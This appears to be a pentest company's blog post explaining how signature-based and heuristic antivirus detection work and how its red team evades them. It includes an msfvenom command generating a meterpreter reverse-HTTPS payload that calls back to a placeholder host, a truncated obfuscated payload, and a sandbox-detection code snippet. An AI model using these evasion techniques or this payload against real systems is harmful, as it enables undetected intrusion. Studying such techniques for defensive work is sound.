While conducting Red Teaming, Phishing and Internal Pentest investigations, we regularly enter environments where antivirus programs are running. This can lead to blocking access by means of a simple payload. Payloads are scripts that attackers use to communicate with a hacked system. These can be sophisticated payloads that connect the target to a C2 infrastructure, or they can be simple reverse shells.

This article explains how to bypass antivirus software in order to execute more advanced payloads as well.


Antivirus is software used to prevent, scan, detect and remove viruses on a computer. After installation, most antivirus software runs automatically in the background to provide real-time protection against virus attacks.


In order to bypass an antivirus, it is important to first know how it works in basic terms.

Usually antivirus software works with two detection systems, namely: signature-based detection and heuristic-based detection. To find out exactly how a specific antivirus software works, it can be examined using reverse engineering. Often this is not necessary to circumvent detection, as most commercial antivirus software uses similar detection methods.


Signature-based detection is the most widely used and traditional way to detect threats. In the past, it was the only method used to detect viruses. Since it is relatively easy for attackers to circumvent, it is now mostly used in combination with other detection methods, such as heuristic-based detection.

Signature-based detection detects threats by comparing components or an entire program against a database that keeps track of known threats. As soon as a new virus or malware variant is discovered, the antivirus vendor creates a new signature and stores it in the database. It is then possible to provide protection against this specific piece of malware based on this signature. It also looks for static instructions that are often used in malware.


Heuristic-based detection detects threats by testing the behavior of the program. This is done in a so-called “sandbox environment”. Here the program is run in and as soon as the program performs questionable actions, it is terminated and deleted.


Antivirus software is constantly being updated. As many as hundreds of new threats are added daily to the databases this software draws from. As a result, malware writers must constantly invent new methods to evade detection. The theory of detection often remains the same, therefore it is important to make small changes to the malware code to actually achieve the same goal.


To bypass signature-based detection, the file must be modified so that the blacklisted signatures no longer match. If there are functions in the code that are known to be in the signature databases, they must be replaced with another function to achieve the same thing. Also, functions should not be called too often. In some cases, a specific function is not blacklisted when called once, but is blacklisted when called multiple times in a row.

The codebase and payload should be obfuscated. This means not using function names that could potentially give away that the script is a malware. So words like “payload runner”, “reverse shell”, “malware” and similar strings should be replaced with random words. The same applies to standard functions in programming languages that are often used to run malware. These can be packed into a custom function, for example.

Signature-based detection is often easy to circumvent by using obfuscation in the malware code. Below is an example of a meterpreter payload that has been obfuscated.

Raw meterpreter payload:

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=X.X.X.X LPORT=443 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 727 bytes
Final size of csharp file: 3715 bytes
byte[] buf = new byte[727] {

Obfuscated meterpreter payload:

string str = "uWDLz7uKnGVTaBc8GCFhPAelaCxBC60USQLLHHsZ7QZlZXniA+kiNRtn4ScTOQK0mktYBiZvBgfog00PYpCEu...

By adding signature-based detection bypasses to a custom malware runner, we lower the detection rate to 5/26 antivirus vendors. This can be seen in the image below:


Bypassing heuristic-based detection is a bit more complex. It cannot be done by obfuscating the malware code. To bypass heuristic-based detection, the antivirus sandbox must be detected by the malware. If the malware is run in a sandbox by the antivirus, the malware can call an exit function and stop the program. This does not look suspicious to an antivirus because the malware itself will never be run in the sandbox. If the malware is run on a normal machine, the malware will be executed.

Also, the behavior of the malware should be as “normal” as possible. So no files should be left on the hard drive, it should run completely in-memory and it should be hidden. In addition, it is important that the network traffic does not deviate from the rest of the normal network traffic. This can cause it to be blocked by a firewall.

One way to detect a sandbox is to use non-emulated windows APIs. Non-emulated APIs cannot run in emulated environments, such as in the sandbox environment of the antivirus software, in which the heuristic tests are performed. Using the snippet below it is possible to detect a sandbox and bypass the heuristic tests:

IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if (mem == null)

There are publicly available programs to fuzz non-emulated APIs, for example: https://github.com/jackullrich/Windows-API-Fuzzer


For our Pentest work at Onvio, we develop custom malware that is not detected by antivirus software. The screenshot below shows that the software is not detected by the various vendors/detection mechanisms and an external connection to a compromised system on the network has been established. The screenshot below is a combination of signature-based and heuristic-based detection bypasses, this results in 0/26 detection by antivirus publishers:

By running the malware on an up-to-date system, with a latest version antivirus, it results in a system compromise: